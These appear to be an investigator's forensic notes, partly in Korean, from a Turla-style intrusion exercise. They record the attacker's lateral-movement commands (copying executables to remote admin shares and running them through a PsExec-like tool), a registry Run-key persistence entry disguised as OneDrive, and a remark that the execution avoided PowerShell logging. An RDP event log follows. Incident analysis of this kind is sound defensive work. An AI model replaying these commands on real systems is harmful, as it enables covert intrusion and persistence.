Set-ADComputer -Identity "hobgoblin" -Description "Gunter Workstation"`
Set-ADComputer -Identity "khabibulin" -Description "Adalwolfa Workstation"
Set-ExecutionPolicy -Scope CurrentUser bypass
ping 10.20.10.20
sc.exe \\\\10.20.20.102 stop **ViperVPNSvc**; sc.exe \\\\10.20.20.102 start ViperVPNSvc
xcopy.exe C:\\windows\\system32\\wsqmanager.exe \\\\10.20.20.104\\C$\\Windows\\system32\\ /Y
wsqsp.exe \\\\10.20.20.104 -s C:\\windows\\system32\\wsqmanager.exe
wsqsp.exe \\\\10.20.20.104 "reg add \\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\" /v \\"Onedrive\\" /t REG_SZ /d" \\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\wingtsvcupdt.exe -r\\"" /f"
xcopy.exe C:\\windows\\system32\\SecEdit.ps1 \\\\10.20.20.104\\C$\\Windows\\system32\\ /Y
wsqsp.exe \\\\10.20.20.104 powershell C:\\\\Windows\\\\System32\\\\SecEdit.ps1
xcopy.exe C:\\windows\\system32\\SecEdit.ps1 \\\\10.20.20.104\\C$\\Windows\\system32\\ /Y
wsqsp.exe \\\\10.20.20.104 powershell C:\\\\Windows\\\\System32\\\\SecEdit.ps1
레지스트리 확인가능 but RDP 접속에 사용한 건 아닌 듯
wsqsp.exe 를 통해서 실행시켜서 Powershell 로그에 안남았음
wsqmanager.exe는 https://attackevals.mitre-engenuity.org/results/enterprise/?vendor=rapid7&scenario=1&evaluation=turla 에서 확인 가능
RDP로 검색
10.20.20.102 대상 ⇒ BANNIK.skt.local // 정황 상 이게 현재 PC
S-1-5-21-3447876202-3150415290-2715085020-1000
<Event xmlns="<http://schemas.microsoft.com/win/2004/08/events/event>">
<System>
<Provider Name="Microsoft-Windows-TerminalServices-ClientActiveXCore" Guid="28aa95bb-d444-4719-a36f-40462168127e" />
<EventID>1024</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>101</Task>
<Opcode>10</Opcode>
<Keywords>0x4000000000000000</Keywords>
<TimeCreated SystemTime="2024-10-02T21:01:27.5121243Z" />
<EventRecordID>1</EventRecordID>
<Correlation ActivityID="1f99c4a6-24ab-4be1-8be8-b0fab1590000" />
<Execution ProcessID="3896" ThreadID="1968" />
<Channel>Microsoft-Windows-TerminalServices-RDPClient/Operational</Channel>
<Computer>BANNIK.skt.local</Computer>
<Security UserID="S-1-5-21-3447876202-3150415290-2715085020-1000" />
</System>
<EventData>
<Data Name="Name">Server Name</Data>
<Data Name="Value">10.20.20.102</Data>
<Data Name="CustomLevel">Info</Data>
</EventData>
</Event>
10.20.10.9 대상 ⇒ HOBGOBLINE.skt.local // 정황상 이게 다음 PC
S-1-5-21-3267669777-2918179565-1798510834-1000
S-1-5-21-2484783752-389083480-4161398059-1000
접속 시간은 [연결된 디바이스 > 원격 데스크톱 프로토콜] 에서 보면 될듯